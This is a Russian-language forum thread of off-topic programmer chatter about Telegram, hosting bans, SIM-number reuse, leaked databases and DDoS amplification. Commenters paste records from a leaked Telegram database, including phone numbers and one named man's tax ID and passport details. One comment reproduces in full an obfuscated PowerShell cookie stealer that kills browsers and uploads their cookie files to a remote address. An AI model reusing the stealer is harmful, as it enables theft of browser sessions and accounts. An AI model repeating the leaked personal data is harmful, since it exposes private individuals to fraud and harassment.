1. Куча / Говнокод #26776

    0

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    IT Оффтоп #49
    
    
    #1: https://govnokod.ru/18142 https://govnokod.xyz/_18142
    #2: https://govnokod.ru/18378 https://govnokod.xyz/_18378
    #3: https://govnokod.ru/19667 https://govnokod.xyz/_19667
    #4: https://govnokod.ru/21160 https://govnokod.xyz/_21160
    #5: https://govnokod.ru/21772 https://govnokod.xyz/_21772
    #6: (vanished) https://govnokod.xyz/_24063
    #7: https://govnokod.ru/24538 https://govnokod.xyz/_24538
    #8: (vanished) https://govnokod.xyz/_24815
    #9: https://govnokod.ru/24867 https://govnokod.xyz/_24867
    #10: https://govnokod.ru/25328 https://govnokod.xyz/_25328	
    #11: (vanished) https://govnokod.xyz/_25436
    #12: (vanished) https://govnokod.xyz/_25471
    #13: (vanished) https://govnokod.xyz/_25590
    #14: https://govnokod.ru/25684 https://govnokod.xyz/_25684
    #15: https://govnokod.ru/25694 https://govnokod.xyz/_25694
    #16: https://govnokod.ru/25725 https://govnokod.xyz/_25725
    #17: https://govnokod.ru/25731 https://govnokod.xyz/_25731
    #18: https://govnokod.ru/25762 https://govnokod.xyz/_25762
    #19: https://govnokod.ru/25767 https://govnokod.xyz/_25767
    #20: https://govnokod.ru/25776 https://govnokod.xyz/_25776
    #21: https://govnokod.ru/25798 https://govnokod.xyz/_25798
    #22: https://govnokod.ru/25811 https://govnokod.xyz/_25811
    #23: https://govnokod.ru/25863 https://govnokod.xyz/_25863

    #24: https://govnokod.ru/25941 https://govnokod.xyz/_25941
    #25: https://govnokod.ru/26026 https://govnokod.xyz/_26026
    #26: https://govnokod.ru/26050 https://govnokod.xyz/_26050
    #27: https://govnokod.ru/26340 https://govnokod.xyz/_26340
    #28: https://govnokod.ru/26372 https://govnokod.xyz/_26372
    #29: https://govnokod.ru/26385 https://govnokod.xyz/_26385
    #30: https://govnokod.ru/26413 https://govnokod.xyz/_26413
    #31: https://govnokod.ru/26423 https://govnokod.xyz/_26423
    #32: https://govnokod.ru/26440 https://govnokod.xyz/_26440
    #33: https://govnokod.ru/26449 https://govnokod.xyz/_26449
    #34: https://govnokod.ru/26456 https://govnokod.xyz/_26456
    #35: https://govnokod.ru/26463 https://govnokod.xyz/_26463
    #36: https://govnokod.ru/26508 https://govnokod.xyz/_26508
    #37: https://govnokod.ru/26524 https://govnokod.xyz/_26524
    #38: https://govnokod.ru/26539 https://govnokod.xyz/_26539
    #39: https://govnokod.ru/26556 https://govnokod.xyz/_26556
    #40: https://govnokod.ru/26568 https://govnokod.xyz/_26568
    #41: https://govnokod.ru/26589 https://govnokod.xyz/_26589
    #42: https://govnokod.ru/26600 https://govnokod.xyz/_26600
    #43: https://govnokod.ru/26604 https://govnokod.xyz/_26604
    #44: https://govnokod.ru/26627 https://govnokod.xyz/_26627
    #45: https://govnokod.ru/26635 https://govnokod.xyz/_26635
    #46: (vanished) https://govnokod.xyz/_26646
    #46: (vanished) https://govnokod.xyz/_26654
    #47: https://govnokod.ru/26671 https://govnokod.xyz/_26671
    #48: https://govnokod.ru/26707 https://govnokod.xyz/_26707
    #49: https://govnokod.ru/26750 https://govnokod.xyz/_26750

    Запостил: inkanusinho, 28 Июня 2020

    Комментарии (673) RSS

    • Я обосрался.
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • про телеграм-то зачем пост потерли
      Ответить
      • Какой багор )))
        Ответить
      • Кстати, как получить аватарки для всей этой таблицы? Только через api.telegram.org, предварительно зарегистрировав бота и получив токен? А без токена никак?
        Ответить
        • Ты хочешь по ним мыло отреверсить?

          З.Ы. О, кстати, а для регистрации бота надо телефон?
          Ответить
          • Тут пишут, что для получения ключей нужно побазарить с ботовым батей:
            https://core.telegram.org/bots#3-how-do-i-create-a-bot
            Ответить
          • Оказывается, аватарки можно тупо скачать с сайта t.me. В HTML-коде профиля есть такой элемент:
            <meta property="og:image" content="-- вот тут URL аватарки --">
            Ответить
          • Кстати, про реверс. Один чувак попытался собрать аватарки из «Whatsapp», чтобы потом по ним отреверсить профили в соцсетях:
            https://habr.com/ru/post/262053/

            «Whatsapp» ему за брутфорс несколько номеров забанил, вроде даже навечно. Вот будет прикол, когда номера освободятся, их отдадут другим, и эти люди не смогут зарегистрироваться в «Whatsapp».
            Ответить
      • grep inho$ t40_xss.csv
        Ответить
      • В базе две трети телефонных номеров почему-то принадлежат Ирану. Ловим остальные:
        grep -P "^[^,]*,[^,]*,[^,]*,7" t40_xss.csv >ru.csv
        grep -P "^[^,]*,[^,]*,[^,]*,380" t40_xss.csv >ua.csv
        grep -P "^[^,]*,[^,]*,[^,]*,37" t40_xss.csv >sng1.csv
        grep -P "^[^,]*,[^,]*,[^,]*,99" t40_xss.csv >sng2.csv


        Ещё обнаружилось почти две тысячи номеров из гермашки, но все почему-то Саиды, Ахмады, Амиры, Хамиды. Этнические немцы «Телеграмом» не пользуются что ли?
        Ответить
        • У азиатов вообще прикольные учётки:
          24256777,Рашид индивидуальной мебели на заказ.,Изготовление индивидуальной мебели на заказ..,998903178466,464678319,MaStRTaSking,1566982964000
          6551556, Х У Л И Г А Н  ,NE VAZMOJNA VERNUTSA V PROSHLOE I IZMENIT START NO NADO STARTANU,998946222333,72070881,Otabek_T_R,1564591288000
          7334092,\ЗЕЛЁНАЯ АПТЕКА\,+998 91 653 10 90,998916531090,530656044,zelyonayaapteka,1559931440000
          357022,Мубашшир,Мухаммадсобиров Дизайнер,998906422020,733616084,Mubashshirofficial


          Да и у белорусов интересные встречаются:
          7333892,Детский психолог,Юлия Куколева,375291343896,252228823,detskij_psiholog,1569235293000
          Ответить
          • Но самый пиздец — вот эта запись:
            11006325,ПАВЕЛ ЛЕОНИДОВИЧ СИТНИКОВ,Крыса ворующая базы с RaidForums и продающая их в своем канале https://t.me/freedomf0x,79992161984,ИНН 602507478203,Паспорт Серия 5806 № 865451, выдан 18.10.2006
            Ответить
            • Ты эту инфу решил сюда скопировать, чтобы она уже и в поисковиках проиндексировалась и Павел Леонидович до конца веков не отмылся от позора воровства с базы?
              Ответить
              • Чёрт! Не подумал. Как теперь её удалить?
                Ответить
                • Позвони Страйкеру, он ёбнет пост.
                  Ответить
                  • Поддерживаю. Всё равно пост зашкварен кривой нумерацией.
                    Ответить
                  • Я могу к нему на работу в «Амперкот» завалиться, типа за радиодеталями зашёл. Он сейчас в Москву релоцировался.

                    Смотри, какой деанон:
                    https://market.yandex.ru/shop--amperkot-ru/378736/reviews
                    Ответить
              • Кстати, сам Павел Леонидович пишет: «information must flow free, money kill it». Типа он против продажи баз данных. А в его канале сплошные новости:
                https://telemetr.me/content/freedom_fox/

                Возможно, админ RaidForums с ним посрался и решил напакостить.
                Ответить
    • https://youtu.be/mFiT_M-Bi20
      Ответить
    • У меня «Гитхаб» глючит. Нашёл в телеграм-канале Павла Леонидовича интересные ссылки, а скачать и посмотреть не могу, вываливается ошибка 500.
      Ответить
      • P.S. Скачал вот эту хрень: https://github.com/swagkarna/hmmcookies

        Собственно код:
        $fire_p = Get-Process firefox -ErrorAction SilentlyContinue; if ($fire_p) { $fire_p.CloseMainWindow();Sleep 2;if (!$fire_p.HasExited) {$fire_p | Stop-Process -Force;}};$chrome_p = Get-Process chrome -ErrorAction SilentlyContinue;if ($chrome_p) {  $chrome_p.CloseMainWindow();  Sleep 2;  if (!$chrome_p.HasExited) { $chrome_p | Stop-Process -Force;  }};$opera_p = Get-Process opera -ErrorAction SilentlyContinue;if ($opera_p) { $opera_p.CloseMainWindow();Sleep 2;  if (!$opera_p.HasExited) { $opera_p | Stop-Process -Force;  }};$uri=$args[0];$chrome=("$Env:USERPROFILE\AppData\Local\Google\Chrome\User "+(('Datak'+'gyDe'+'f'+'au'+'ltkgy'+'Cookie'+'s')  -crePLACe ([cHAr]107+[cHAr]103+[cHAr]121),[cHAr]92));$base64chr=[Convert]::ToBase64String([IO.File]::ReadAllBytes($chrome));$postparamschr="chr=$base64chr";Invoke-RestMethod -Uri $uri -Method Post -Body $postparamschr;[email protected](Get-ChildItem "$Env:USERPROFILE\AppData\\Roaming\Mozilla\Firefox\Profiles\" -Recurse -Force -Include *cookies.sqlite* -Name);$moz_path="$Env:USERPROFILE\AppData\\Roaming\Mozilla\Firefox\Profiles\";foreach ($f in $moz) {$convert=$moz_path+$f;$base64file=[Convert]::ToBase64String([IO.File]::ReadAllBytes($convert));$postparams="moz=$base64file";Invoke-RestMethod -Uri $uri -Method Post -Body $postparams;};$opera=("$Env:USERPROFILE\AppData\Roaming\Opera "+('Softw'+'are'+'sxa'+'Oper'+'a'+' ').RePlACE(([char]115+[char]120+[char]97),'\')+('S'+'tableWQ2Cook'+'i'+'e'+'s').REpLACE(([char]87+[char]81+[char]50),'\'));$base64opr=[Convert]::ToBase64String([IO.File]::ReadAllBytes($opera));$postparamsopr="opr=$base64opr";Invoke-RestMethod -Uri $uri -Method Post -Body $postparamsopr;


        Лицензия GPL v.3.
        Ответить
    • показать все, что скрытоvanished
      Ответить
      • Океания никогда не воевала с Остазией.
        Ответить
        • Я так и знал!
          Осетия, Обама, Остазия, Ось, Океания, Омерика
          , Опиц, собрание Орловых, Осознание. Это все заговор!
          Ответить
      • > никогда не запрещали телеграм

        Дык это правда. Они запретили питоньи баги, кутишный исталлятор и ещё тыщу-другую ни в чём не виноватых сайтов. А телеграм по факту так и не запретили.
        Ответить
        • показать все, что скрытоvanished
          Ответить
          • Цифровой Океан даже письмо прислал, что их серваки были разбанены и VPS'ки теперь можно юзать без проблем.
            Ответить
            • показать все, что скрытоvanished
              Ответить
            • показать все, что скрытоvanished
              Ответить
              • Амазон по-моему их так и выпнул.
                Ответить
              • показать все, что скрытоvanished
                Ответить
                • > жирнющего клиента

                  Который шатается как слон в посудной лавке, зашкваривая твои айпишники, и не приносит бабло потому что эти прокси живут меньше дня.

                  Я думаю у них в TOS есть правило чтобы от таких клиентов по-быстрому избавиться.
                  Ответить
                  • показать все, что скрытоvanished
                    Ответить
                    • Ну а сколько там эти прокси жили? Хостер за это время получал сраные копейки, а гемор с переиспользованием этого айпишника для нормальных клиентов оставался.

                      Вполне логично такого клиента выгнать нахуй. По пункту о нанесении ущерба инфраструктуре, к примеру. Пусть воюет за швабодку в другом месте.
                      Ответить
                      • показать все, что скрытоvanished
                        Ответить
                        • Тем не менее, гугл с амазоном как бы невзначай запретили domain fronting. Типа для защиты от малвари, которая юзает те же приёмы с кучей плавающих по облаку айпишников. Телеграм тут само собой не при делах, просто совпало по времени.

                          Видимо у DO так не прокатило т.к. у них реальные VPS'ки а не облачная хуйня. Ну или их не так сильно зацепило блокировками.
                          Ответить
                          • Правильно сделали, телеграм — это рак на теле интернетов, а ещё в нём сидят одни террористы и норкоманы.
                            Ответить
                          • показать все, что скрытоvanished
                            Ответить
                            • Кстати у DO например есть замечательный пункт про "retaliation against DO" - запрещены любые действия, которые могут привести к возмездию против их сервисов и сотрудников.

                              И судя по тому, что Паша начал спонсировать рандомных добровольцев на поднятие проксей для телеги, оттуда его тоже мягко пидорнули.
                              Ответить
                              • показать все, что скрытоvanished
                                Ответить
                                • Да. DDoS их серверов там прям как пример этого самого возмездия приведён.
                                  Ответить
                                  • Какой всё таки ёбаный стыд эти ваши облака
                                    Ответить
                                    • Просто бизнес, ничего личного.
                                      Ответить
                                      • показать все, что скрытоvanished
                                        Ответить
                                        • > блек хол
                                          Да, именно оно. Если точнее — весь трафик на проблемный IP просто роутится в 0.0.0.0. Собственно, обычно провайдеры так и делают (причём чаще всего в автоматическом режиме), удаление сервера — крайняя мера, когда на клиента сыпется слишком уж неадекватное количество атак.
                                          Реальный пример письма щщастья: https://i.imgur.com/zyBksxG.png (говноконтора, кстати, не рекомендую).
                                          Ответить
                                          • показать все, что скрытоvanished
                                            Ответить
                                            • > Сообщество "афроамериканская дыра"
                                              А, такую штуку не встречал.

                                              > А Виталий твой VDS прикрыл, или откуда ты это взял?
                                              Мой, старая история. В конце там Дмитрий забанил этот IP навечно.
                                              Ответить
                                              • Ну вот смысл дырки в том, что даже если провайдер выкинет весь траффик в null, то всё равно к нему этот траффик придет.

                                                Вот у провайдера есть пять пиров, и с каждого пира к нему течет говно на твой IP. Он может за этот траффик платить (смотря какие отношения с пирами), траффик этот забивает канал, итд.

                                                Ну вот в BGP есть т.н. "коммунити расширения", которые пиры могут понимать

                                                Пров шлет своим пирам расширение "пожалуйста, выкидывайте в мусор траффик на 1.2.3.4", они его принимают к сведению.

                                                Причем каждому пиру достается мааахонький кусочек траффика, и ему его грохнуть проще.

                                                А за что тебя досили?
                                                Ответить
                                                • > Пров шлет своим пирам расширение "пожалуйста, выкидывайте в мусор траффик на 1.2.3.4", они его принимают к сведению.
                                                  А, понял.

                                                  > А за что тебя досили?
                                                  В одной старенькой игре играли в войнушку. Взломы, дудосы, дефейсы, вот это всё. Бюджет пять баксов, на входе пара гигабит, пинг критичен. Собственно, с тех пор у меня развились ПТСР и маниакальное желание прикрывать IP-адреса за «Cloudflare».
                                                  Ответить
        • "Чисто технически, никто не запрещал телеграм.
          Они запрещали провайдерам предоставлять доступ в телеграм.
          Как вы не понимаете? Это другое!"
          Ответить
      • А когда при скачивании сайты вместо телеги выдавали "В рашке низзя" это была их собственная инитиатива?
        Ответить
        • Дык предоставлять доступ было нельзя, вот они и не предоставляли.
          Ответить
          • не предоставлять не доступ не было нельзя, вот не они и не предоставляли
            Ответить
          • А сорян, я до этого момента даже не открывал статью.

            Какой мягкий запрет )))

            Это как конфеты прятать от детей на верхней полке. Даже если свиснешь, тебе максимум пальчиком погрозят и перепрячут в другое место.
            Ответить
            • Дык почти все запреты обычно так работают - продажа, хранение, изготовление. Но приобретение для личного использования не наказывается.

              Но если ты сразу возьмёшь весь мешок конфет, больше чем можешь съесть за раз - то тебе скорее всего запишут хранение.
              Ответить
              • А если взять конфетки себе и другу, даже если по одной, то меня в конфеткокурьеры запишут?
                Ответить
                • > и другу

                  Ну это уже распространение, да.
                  Ответить
    • Где-то здесь обсуждалось, но, скорее всего, все уже забыли.

      Песня, сгенерированная нейросетью:
      https://youtu.be/9_X1Fsrt3dw

      А вот несколько штук из альбома собрали в один клип:
      https://youtu.be/vliEc18lQhQ
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • Почему я не вижу этот тред в куче?
      Ответить
      • Блядь в натуре поцоны где блядь тред не вижу нихуя, алло!
        Ответить
      • Подтверждаю. Это чудо Страйкерово!
        Ответить
        • Хуюдо Сракерово.
          Ответить
          • Неполная лексическая эхо-редупликация?
            Ответить
        • Мяу. Подтверждаю.
          Ответить
          • Теперь опровергаю.
            Ответить
            • Опровергаю опровержение.
              В стоке есть, на главное нет.
              Похоже страйкеринхо поставил костыль на оффтопы, также как это было с заминусованными тредами.
              Ответить
              • Почему котёнок на твоей аве такой желтый? Им кто-то подтёрся?
                Ответить
              • Но остальные оффтопы видно в куче. Т.е. это не регулярка.
                Ответить
                • Ну так он скрыл все сорок девятые оффтопы.
                  Ответить
                  • Хм, лол. Т.е. следующий тоже придётся называть 49?
                    Ответить
      • Как ты тогда попал в этот тред?
        Ответить
    • показать все, что скрытоvanished
      Ответить
      • > чаты не перенеслись

        Радуйся. А то потом номер сменишь и они перенесутся новому владельцу. Опсосы же им не кидают уведомление о том что номер сдох.

        З.Ы. У вацапа вроде какой-то бекап можно было выгрузить. Может и тут тоже такая механика есть.
        Ответить
        • показать все, что скрытоvanished
          Ответить
          • А если новый владелец номера за эти 3 месяца успеет накатить телегу, то что будет?
            Ответить
            • показать все, что скрытоvanished
              Ответить
              • А хер знает, сразу после освобождения номера скорее всего могут продать. Ну какое-то время пройдёт пока твой номер попадёт в конвертики с симками, конечно. Но я не думаю что они специально какой-то таймаут выдерживают.

                Т.е. если ты идёшь расторгать договор, то лучше телегу ёбнуть заранее.
                Ответить
                • показать все, что скрытоvanished
                  Ответить
                  • Ну время от последнего платного действия до расторжения договора и блокировки симки - да, где-то полгода. А вот через какое время после расторжения они смогут продать симку - х.з.

                    Я полгода на мтс не юзал. Когда пришёл в офис чтобы восстановить, мне сказали что номер уже у другого чела.

                    Т.е. продают довольно быстро. И скорее всего это не какая-то формализованная задержка для твоей защиты, а просто время пока симка дойдёт до прилавка и будет продана.
                    Ответить
                    • Я с этими рассказами стану скоро таким же симкопараноиком, как и вы!
                      Ответить
                      • У меня тоже есть реальные примеры, когда номер продавали новому челу чуть ли не на следующий день после расторжения договора.
                        Ответить
                        • Кстати у всех операторов офигенная политика - они по таймауту подключают услугу, которая довольно быстро сливает бабло со счёта. И когда дойдёт до нуля - договор расторгают. В итоге они тебе ничего не должны если ты вдруг проснёшься и вспомнишь про старую симку.
                          Ответить
                          • Сейчас ещё и сроки урезали. Теперь уже не полгода, а меньше.
                            Ответить
                        • Реальный пример педерачи номера телефона с «Телеграмом» кому-то другому:
                          Telegram, [00.00.18 10:13]
                          ВНИМАНИЕ. Запрос на сброс аккаунта.
                          
                          gost, мы получили запрос на удаление аккаунта в Telegram, привязанного к номеру телефона
                          +380. Если Вы не хотите, чтобы аккаунт был удален, отмените это по следующей ссылке:
                          https://t.me/confirmphone?phone=380&hash=kokoko
                          
                          Эта ссылка будет действовать ещё 7 дней. Если за это время Вы не отмените запрос, то Ваш
                          аккаунт будет удален со всей перепиской, файлами и контактами, тогда пароль от двухэтапной
                          аутентификации будет сброшен.
                          
                          Если у Вас больше нет доступа к указанному номеру телефона, пожалуйста, обновите номер в
                          настройках приложения.
                          
                          С уважением,
                          Команда Telegram
                          
                          
                          Telegram, [00.00.18 10:17]
                          Незавершенная попытка входа. gost, мы обнаружили попытку входа в Ваш аккаунт с нового
                          устройства 00/00/2018 в 07:12:44 UTC.
                          
                          Устройство: Android
                          Место: Germany (IP = 185.220.102.7)
                          
                          Никто не получил доступ к Вашей переписке, потому что входа в аккаунт не произошло. Код
                          был введен верно, но правильный пароль указан не был.
                          
                          Если это были не Вы, перейдите в Настройки > Конфиденциальность > Активные сеансы и
                          сбросьте незавершенную попытку входа.
                          
                          
                          Telegram, [00.00.18 12:12]
                          Вы изменили номер телефона на +380 и успешно отменили удаление Вашего аккаунта. Все
                          данные аккаунта благополучно сохранятся.
                          
                          Для безопасности аккаунта важно, чтобы у Вас всегда был указан актуальный номер телефона.

                          В тот раз я оказался быстрее и успешно поменял номер на другой (разумеется, тоже на одноразовый мусоросборник).
                          Кстати, интересно, что аккаунт пытались сбросить из «Tor»: видимо, какая-то массовая закупка акков для спама.
                          Ответить
                        • В общем-то, на мыльном сервисе, по крайней мере, на говне типа мейлру, тоже есть риск потерять адрес, если долго не пользоваться.

                          Но почту я могу с еблей и танцами самому себе поднять на впске и параноить по полной, а вот свой опсос мне нихуя никогда не светит.
                          Ответить
                          • Ну почта всё-таки меньше от внешних факторов зависит.

                            А номер банальный переезд в другой регион не переживает. Благо хоть между операторами сейчас переходить можно.
                            Ответить
            • показать все, что скрытоvanished
              Ответить
            • Если ты не защитил акк паролем (ЕМНИП, «Cloud password»), то новый владелец получит джекпот в виде твоей переписки с камерунскими хуями.
              Ответить
              • А какие способы для восстановления этого пароля есть? Явно не телефон же, это было бы смешно.
                Ответить
                • Хуй знает, не пробовал. По идее никаких не должно быть, иначе это действительно получается не 2-F, а самый простой 1-F.
                  Ответить
                  • На мыло можно судя по доке. Если ты его добавил.
                    Ответить
          • Не знаю, по-моему очень правильная политика, что всё локально на девайсе хранится. И ты сам отвечаешь за бекапы.

            Раньше, до ебучих облаков, все чатики так делали и никого это особо не парило.
            Ответить
            • показать все, что скрытоvanished
              Ответить
              • Да хуйню он сделал, если честно.

                Номер телефона - очень плохой идентификатор, в отличие от того же емейла. Но он снижает порог вхождения, а пашке нужно больше юзеров.

                Если бы первичным идентификатором было мыло, а телефон бы юзался только как второй фактор, то ты бы вообще не задумывался о проёбе номера. И тебе не пришлось бы удалять аккаунт с проёбом всей переписки при смене номера.

                Не знаю почему ты оправдываешь эту говноархитектуру.
                Ответить
      • Да.

        Там надо руками синхронизацию включать.
        Ответить
    • показать все, что скрытоvanished
      Ответить
    • https://habr.com/ru/news/t/509496/
      > Хакер взламывает базы данных MongoDB и требует выкуп с угрозами слить персданные и сообщить в органы защиты GDPR
      > В начале июля 2020 года издания BleepingComputer и ZDNet сообщили, что злоумышленник смог получить удаленный доступ к более чем 22 тыс. баз данных MongoDB, часть из которых даже не были защищены паролями.
      Ответить
      • > взламывает

        Ну блин, если ты дверь забыл закрыть, то это не взлом. Зачем, зачем светить портами монги наружу?
        Ответить
        • Хипстеры-смузихлёбы небось настраивали. «MongoDB», «NoSQL», «JSON», вот это всё.

          > часть из которых даже не были защищены паролями
          Сервис без пароля, доступный снаружи всему Интернету. Да ещё и, судя по тому, что злоумышленник перезаписал данные, с правами на запись.
          Если он и правда сольёт их всех в «GDPR», то совершит благое дело.
          Ответить
          • Ещё типичная ситуация — «memcached» без пароля, торчащий наружу.
            Ответить
            • Ага, точно, на нём ещё можно охуенно амплифицироваться (https://www.cloudflare.com/learning/ddos/memcached-ddos-attack/ — тут пишут про 1:51200).
              Ответить
              • На некоторых сайтах в мемкэше можно отыскать свою учётку и поменять у неё роль на админа.
                Ответить
              • Ещё кое-что погуглил:
                1433 - Pentesting MSSQL - Microsoft SQL Server
                3306 - Pentesting Mysql
                5432,5433 - Pentesting Postgresql
                5984 - Pentesting CouchDB
                6379 - Pentesting Redis
                9200 - Pentesting Elasticsearch
                11211 - Pentesting Memcache
                15672 - Pentesting RabbitMQ Management
                27017,27018 - Pentesting MongoDB


                https://book.hacktricks.xyz/pentesting/27017-27018-mongodb

                >> By default mongo does not require password.
                >> Admin is a common mongo database.

                Какой багор )))
                Ответить
              • >> амплифицироваться

                Поскольку UDP не требует установления соединения (обмена SYN- и ACK-пакетами, как в TCP), то в поле FROM можно указать чужой айпишник, чтобы мемкэш насрал под чужую дверь?
                Ответить
                • Да. Амплификация через UDP-сервисы — давнишняя и очень, очень сильная боль в жопе у сетевых сервисов. Суть в том, что такие типы атак просты, эффективны и не требуют каких-то сложных телодвижений, вроде рассылки вирусов для создания ботнета или массового взлома камер (ЕМНИП, ботнетом из поломанных вебок в своё время сети «Sony» положили). В то же время, при наличии, скажем, гигабитного сервера, хостер которого с пониманием относится к подозрительному исходящему трафику, и хорошего списка уязвимых сервисов (которые с того же сервера сканируются за полдня), можно легко организовать неплохую атаку в 30-50 гигабит, которая выведет из строя любой сервер без надлежащей защиты.
                  Одним из первых типов таких атак были, если мне не изменяет память, амплификация через открытые DNS-резольверы: где-то в начале десятых годов через них провели рекордную на тот момент атаку то ли в 500 гигабит, то ли вообще в терабит. Потом обнаружили серверы с NTP, потом метой стали атаки через SSDP, «Memcached»-амплификацию изобрели эдак пару-тройку лет назад, точно не помню. А ещё можно амплифицироваться через серверы популярных UDP-игр, вроде «Counter Strike», «Garry's mod», «Team Fortress» и прочих, но это совсем экзотика.
                  Ответить
                  • Это, кстати, хороший пример того, как проёб в архитектуре (во времена, когда придумывали «IP», подразумевалось, что все пользователи — вежливые и хорошие люди, и делать плохих вещей не будут) доставляет гору неприятностей и миллионы долларов убытков через десятки лет после того, как этот проёб был допущен.
                    Ответить
                    • Еще BGP вспомни.
                      Ответить
                    • Так ведь «Интернет» начинался с «Арпанета» — сети для муриканских военных. В «Арпанет» выходили серьёзные дяди в погонах с компьютеров с инвентарными номерами. Если бы кто-то в «Арпанете» попытался похулиганить, его бы быстро нашли и в должности понизили.

                      Потому, видимо, все протоколы изначально были с фатальными недостатками. Например, «е-мейл», у которого в поле «From:» можно было указать хоть ящик Президента. Или идиотские протоколы «SMTP after POP» и «POP after SMTP» (погугли соответствующие RFC, поржёшь, как конь).
                      Ответить
                    • показать все, что скрытоvanished
                      Ответить
                      • > Точно так же можно поступить и тут: пусть каждый провайдер обязуется проверять FROM для всех пакетов, исходящих из его автономки.
                        > Если он этого не делает, то его объявляют педерастом, и все пиры рвут с ним отношения.
                        Примерно так сейчас и происходит, только с поправкой на то, что Интернет — дохуя огромная, медленная и неповоротливая структура.
                        Ответить
                  • А провайдерские маршрутизаторы с DPI не могут зарубить UDP-пакеты со странным обратным адресом?
                    Ответить
                    • показать все, что скрытоvanished
                      Ответить
                      • Да, до меня чуть позже дошло. Рубится простыми средствами типа iptables. Можно даже фильтровать любые IP-пакеты, не выясняя, какой там протокол следующего уровня.

                        Это даже легче, чем фильтр по портам, потому что для определения порта нужно вытянуть следующий уровень (TCP, UDP, RDP, SCTP, что там ещё с портами бывает).
                        Ответить
                • показать все, что скрытоvanished
                  Ответить
                  • Потому что для этого надо, во-первых, знать о спуфинге (это, как ни странно, не настолько распространённое знание), а во-вторых — грамотно настраивать оборудование. Как ты понимаешь, количество админов-макак не сильно меньше количества макак-программистов, так что имеем что имеем.

                    Справедливости ради, где-то лет пять-семь назад провайдеры таки стали шевелиться, и у большинства такой фокус действительно не пройдёт. Собственно, именно поэтому Интернет ещё работает: чтобы вдоволь наамплифицироваться, нужно либо найти провайдера, сеть которого делали не очень умные люди, либо провайдера, который намеренно позволяет такое делать. В первом случае сервера атакующего, скорее всего, быстро забанят (даже полный долбоёб не сможет не заметить гигабиты какого-то мусорного трафика, взявшегося непонятно откуда), а во втором случае за сервера придётся раскошелиться, и раскошелиться серьёзно (если мне не изменяет память, лоу-левел впски лет пять назад там стоили где-то в районе двухсот долларов), причём нет гарантии, что провайдер не решит тебя послать нахуй.

                    Ещё есть какой-то RFC, который определяет комплекс мероприятий против спуфинга (что-то вроде того, что если в твою сеть прилетает пакет из AS1, а в src указан AS2, то его надо слать нахуй), но я деталей совсем не помню.
                    Ответить
                    • показать все, что скрытоvanished
                      Ответить
                      • показать все, что скрытоvanished
                        Ответить
                      • Проблема в том, что провайдеров много, а определить, какой из них клал хуй на стандарты, можно только после того, как к нему пропишутся предприимчивые люди и начнут срать. Более того, до тех пор, пока поток говна не сильно выделяется на общем фоне (какой-нибудь лишний десяток гигабит трафика, скорее всего, вообще не заметят), пристально анализировать его никто не будет.

                        Но, как я уже писал ниже, работа ведётся, и сейчас найти провайдера-раздолбая достаточно сложно.
                        Ответить
          • > и правда сольёт их в GDPR

            Я бы на его месте тупо слил их в GDPR. Один хер биткоины никто не пришлёт. Да и долбоёбы должны страдать.

            Правда чиновники, которые отвечают за соблюдение GDPR, скорее всего анонимные заявления не принимают?
            Ответить
            • > Да и долбоёбы должны страдать.
              Подтверждаю. А долбоёбы, которые хранят чужие данные в открытых всему Интернету монгах, должны страдать вдвойне.

              > анонимные заявления не принимают?
              ЕМНИП, если у кого-то данные утекли в паблик, то чиновники должны этого кого-то наказать даже без заявлений, но это не точно. Надо гуглить.
              Ответить
              • Ну возбудить против них какую-нибудь проверку или аудит я думаю можно при желании. На крайний случай найти какого-нибудь безбашенного активиста, который от своего имени всё это зарепортит.
                Ответить
            • База хер пойми чья, жалуется анонимус, владельцы ПДн не заявляли. Чиновник только пальчиком помашет - нельзя так делать - и положит болт.
              Ответить
            • В GDPR действительно есть пункт (Глава 2 Статья 5 Пункт 1f сукабляпестец), что Personal data shall be processed in a manner that ensures appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organisational measures (‘integrity and confidentiality’)

              Только вот действие GDPR распространяется только на граждан и подданных стран Евросоюза. Как можно доказать, что человек по имени John Doe из рандомной базы имеет паспорт, например, Британии, я не знаю.
              Ответить
      • Какой багор )))
        Ответить
      • >> По истечении 48 часов мы выложим в открытый доступ все ваши данные.

        Где можно посмотреть опубликованные базы?
        Ответить
      • Помнится лет 5 назад я сканил один диапазон амазоновских айпишков в поисках монгодб. Нашлись сотни незапароленых. Но заработать на этом я не догодался. Видимо слишком правильный.
        Через пару лет снова проверял - там в базах были сообщения о выкупе данных.
        Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
      • N4842, [stmt.dcl], 4:
        Dynamic initialization of a block-scope variable with static storage duration (6.7.5.1) or thread storage
        duration (6.7.5.2) is performed the first time control passes through its declaration; such a variable is
        considered initialized upon the completion of its initialization. If the initialization exits by throwing an
        exception, the initialization is not complete, so it will be tried again the next time control enters the declaration.
        [!] If control enters the declaration concurrently while the variable is being initialized, the concurrent execution
        shall wait for completion of the initialization. If control re-enters the declaration recursively while the
        variable is being initialized, the behavior is undefined.


        Нормально, если внутри самой get_real_potoko_nebezopasniy_pituh() нет гонок (т.е. она не читает и не пишет данные, к которым обращаются другие потоки).
        Ответить
      • показать все, что скрытоvanished
        Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
      • >> Днем я сидела с ребенком, по ночам кодила плохие сайты на php — это позволяло как-то держаться.

        Ничего не понял. Но именно поэтому я за «PHP».
        Ответить
        • показать все, что скрытоvanished
          Ответить
          • А вы ещё ругаете «PHP».
            Ответить
            • показать все, что скрытоvanished
              Ответить
              • Дура! Нашла, чем гордиться.
                Ответить
                • показать все, что скрытоvanished
                  Ответить
                • Ну раз уж речь зашла о камин-аутах, я тоже одно время писал на "PHP".
                  Ответить
                  • Я тоже. Пись-пись на «PHP». А-а на «PHP».
                    Ответить
                  • показать все, что скрытоvanished
                    Ответить
                  • показать все, что скрытоvanished
                    Ответить
                    • показать все, что скрытоvanished
                      Ответить
                    • Попробуй PHP.
                      Взрослые говорят что он вреден, но это ложь.
                      Ты сможешь отказаться PHP в любой момент.
                      PHP делает жизнь интереснее и ярче.
